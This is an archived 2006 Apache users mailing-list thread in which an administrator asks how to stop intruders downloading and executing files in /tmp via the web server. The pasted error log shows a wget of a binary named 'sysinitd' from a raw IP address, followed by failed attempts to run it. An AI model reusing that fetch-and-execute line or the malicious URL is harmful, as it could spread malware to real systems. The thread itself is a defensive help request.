Re: [users@httpd] how to prevent an executing from /tmp

Sat, 03 Jun 2006 03:37:11 -0700

Immidiatley after restart someone donwloads to /tmp file sysinitrd, how do I know wich virtualhost do this? 

[Sat Jun 03 13:30:25 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:25 2006] [notice] LDAP: SSL support unavailable

[Sat Jun 03 13:30:25 2006] [notice] suEXEC mechanism enabled (wrapper: 
/usr/sbin/suexec)
[Sat Jun 03 13:30:26 2006] [notice] Digest: generating secret for digest 
authentication ...

[Sat Jun 03 13:30:26 2006] [notice] Digest: done
[Sat Jun 03 13:30:26 2006] [notice] LDAP: Built with OpenLDAP LDAP SDK
[Sat Jun 03 13:30:26 2006] [notice] LDAP: SSL support unavailable

[Sat Jun 03 13:30:26 2006] [notice] mod_python: Creating 32 session mutexes 
based on 512 max processes and 0 max threads.
[Sat Jun 03 13:30:27 2006] [notice] Apache/2.0.51 (Fedora) mod_perl/1.99_12 
Perl/v5.8.3 DAV/2 PHP/4.3.11 mod_python/3.1.3 Python/2.3.3 mod_ssl/2.0.51 
OpenSSL/0.9.7a configu

red -- resuming normal operations
--13:30:39--  http://212.78.204.20/turbo3000/sysinitd
          => `sysinitd'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]


   0K .......... .......... .......... .                    100%  343.06 
KB/s


13:30:39 (343.06 KB/s) - `sysinitd' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied
--13:30:53--  http://212.78.204.20/turbo3000/sysinitd
          => `sysinitd.1'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]


   0K .......... .......... .......... .                    100%  278.19 
KB/s


13:30:53 (278.19 KB/s) - `sysinitd.1' saved [31,973/31,973]

sh: line 1: ./sysinitd: Permission denied





And I often find a processes with name '-bash' and uid 'apache' - how to 
disallow this?



I remounted /tmp and /home with noexec,nosuid.


Thanks,
G.


----- Original Message ----- 
From: "JP" <[EMAIL PROTECTED]>

To: <users@httpd.apache.org>
Sent: Friday, June 02, 2006 5:23 PM
Subject: RE: [EMAIL PROTECTED] how to prevent an executing from /tmp




Someone often uploads files to /tmp and then executing in on the server
with
webserver user priveleges. How to prevent it?



How about changing the umask of the webuser?

JP


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]





---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]























					Reply via email to